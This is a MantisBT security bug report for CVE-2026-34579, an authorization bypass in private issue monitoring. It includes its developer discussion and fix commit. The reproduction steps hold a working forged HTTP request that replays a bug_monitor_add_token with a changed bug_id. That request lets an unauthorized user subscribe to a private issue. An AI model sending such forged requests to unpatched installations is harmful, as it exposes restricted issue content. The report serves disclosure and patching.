0036975: CVE-2026-34579: Authorization bypass in private issue monitoring allows unauthorized users to subscribe to restricted issues - MantisBT

ID	Project	Category	View Status	Date Submitted	Last Update
0036975	mantisbt	security	public	2026-03-16 12:28	2026-05-09 19:56

Reporter	ninjasec	Assigned To	dregad
Priority	normal	Severity	major	Reproducibility	always
Status	closed	Resolution	fixed
Product Version	2.26.1
Target Version	2.28.2	Fixed in Version	2.28.2

Summary	0036975: CVE-2026-34579: Authorization bypass in private issue monitoring allows unauthorized users to subscribe to restricted issues
Description	A user with project-level access, but without permission to view a private issue, can add themselves as a monitor for that issue by replaying a valid `bug_monitor_add_token` from another issue and modifying the submitted `bug_id`. The application accepts the request and creates a monitor relationship for the private issue. Direct access to the private issue remains blocked in the web UI. However, once added as a monitor, the user may receive notifications for updates to that issue. Based on the recipient-building logic, this creates a credible path to disclosure of private issue metadata and content through email notifications. Affected Components bug_monitor_add.php MonitorAddCommand.php:94 notification recipient handling in email_api.php:320 Root Cause The monitor-add flow validates permission using access_has_project_level() rather than a bug-level visibility check. As a result, the action is authorized based on project membership and threshold alone, without enforcing access to the specific private issue. The private issue visibility gate present in access_api.php:527 is not applied in this path.
Steps To Reproduce	Prerequisites authenticated user account with project access at least one private issue the user is not permitted to view at least one issue the same user is permitted to view, in order to obtain a valid bug_monitor_add_token
Additional Information	Configure issue 1 as private and assign ownership to administrator. Log in as reporter. Confirm that reporter cannot access the private issue: `GET /view.php?id=1 HTTP/1.1 Host: 127.0.0.1:8082 Cookie: MANTIS_STRING_COOKIE=...; PHPSESSID=...; MANTIS_secure_session=1 Observed response: HTTP/1.1 403 Forbidden` Open another issue visible to reporter, for example issue 3, and extract the monitor action token from the page: `<form method="post" action="bug_monitor_add.php" class="form-inline"> <fieldset> <input type="hidden" name="bug_monitor_add_token" value="20260316WZvW4rsIbiF4SP8NXfTLwbmyxN8Ji-0C"> <input type="hidden" name="bug_id" value="3" /> </fieldset> </form>` Reuse that token in a forged request, changing bug_id from 3 to 1: `POST /bug_monitor_add.php HTTP/1.1 Host: 127.0.0.1:8082 Cookie: MANTIS_STRING_COOKIE=...; PHPSESSID=...; MANTIS_secure_session=1 Content-Type: application/x-www-form-urlencoded bug_monitor_add_token=20260316WZvW4rsIbiF4SP8NXfTLwbmyxN8Ji-0C&bug_id=1 Observed response: HTTP/1.1 302 Found Location: http://127.0.0.1:8082/view.php?id=1` Verify that the monitor record was inserted: `select bug_id, user_id from mantis_bug_monitor_table where bug_id = 1;`
Tags	No tags attached.

dregad 2026-03-28 13:59 developer ~0070912	The risk of information disclosure is confirmed. The access check type was changed from bug to project in 2.26.1 by commit MantisBT master-2.26 2e1c8148, to fix a regression preventing to add monitors to a private issue, see 0033404 and related PR https://github.com/mantisbt/mantisbt/pull/1953.

dregad 2026-03-29 05:13 developer ~0070913	Advisory https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v created and CVE request sent. Proposed patch is available at https://github.com/mantisbt/mantisbt-ghsa-fvjf-68wh-rwp2/pull/1/commits/97d08f227db0e1d1c61950d27131bc989fa47e4b (note that the private repo is linked to another advisory; I did that to minimize effort as I'm working on several security issues from the same researcher in parallel). @vboctor, @atrol you may want to review and test this patch to ensure it does not reintroduce the regression fixed in 0033404.

dregad 2026-03-31 03:03 developer ~0070920	CVE-2026-34579 assigned

MantisBT: master-2.28 0a93267d 2026-03-28 14:16 dregad Details Diff	Only let users monitor private issues they can access Fixes an information disclosure vulnerability, which was introduced by the fix for issue 0033404. MonitorAddCommand now checks for monitor_bug_threshold differently, depending on whether the user is adding themselves (bug-level check) or someone lese (project-level check). Fixes 0036975		Affected Issues 0033404, 0036975
	mod - core/commands/MonitorAddCommand.php		Diff File